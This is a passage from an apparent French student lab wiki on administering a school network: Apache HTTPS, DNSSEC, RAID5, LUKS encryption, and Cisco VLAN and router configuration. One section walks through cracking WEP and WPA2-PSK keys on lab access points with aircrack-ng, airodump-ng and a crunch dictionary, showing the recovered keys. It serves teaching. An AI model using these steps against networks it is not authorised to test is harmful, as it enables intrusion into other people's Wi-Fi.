Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
==== Génération de paires de clefs KSK et ZSK ====&lt;br /&gt;
&lt;br /&gt;
Tout comme pour le certification HTTPS,il faut générer deux paires de clefs pour notre DNSSEC. On peut le faire avec la méthode RSAHA1 suivante :&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
On obtient alors deux paires de clefs que l'on renomme et que l'on place dans un dossier (que l'on créé evidemment) à l'emplacement '''/etc/bind/ima2a5-rex4ever.site.dnssec'''&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/db.ima2a5-rex4ever.site ====&lt;br /&gt;
Pour une raison que j'ignore, les commandes liées au DNS ont du mal avec les fichiers en db.quelquechose, on renomme donc '''db.ima2a5-rex4ever.site''' en '''ima2a5-rex4ever.site'''&lt;br /&gt;
Puis on ouvre ce fichier fraichement renommé et on ajoute les lignes de la manière suivante :&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL	604800&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk.key'''&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk.key'''&lt;br /&gt;
  @	IN	SOA	dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
  			29112025	; Serial&lt;br /&gt;
  			 604800		; Refresh&lt;br /&gt;
    			  86400		; Retry&lt;br /&gt;
  			2419200		; Expire&lt;br /&gt;
  			 604800 )	; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
  @  	IN	NS	dns.ima2a5-rex4ever.site.&lt;br /&gt;
  @       IN      NS      ns6.gandi.net.&lt;br /&gt;
  dns	IN	A	193.48.57.163&lt;br /&gt;
  www     IN      A       193.48.57.163&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant faire signer le document grâce à la commande suivante (on créé ainsi le document '''ima2a5-rex4ever.site.signed'''):&lt;br /&gt;
   dnssec-signzone -o ima2a5-rex4ever.site -k ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk ima2a5-rex4ever.site ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sdb1'''&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sdb1&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1):&lt;br /&gt;
First sector (2048-1953525167, default 2048):&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size xxxx.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
La clef est prête, on peut desormais crypter avec l'utilitaire cyptsetup &lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb1&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb1 clef_ima2a_G5&lt;br /&gt;
    mkfs.ext4 /dev/mapper/clef_ima2a_G5&lt;br /&gt;
    mount -t ext4 /dev/mapper/clef_ima2a_G5 /mnt/clef&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
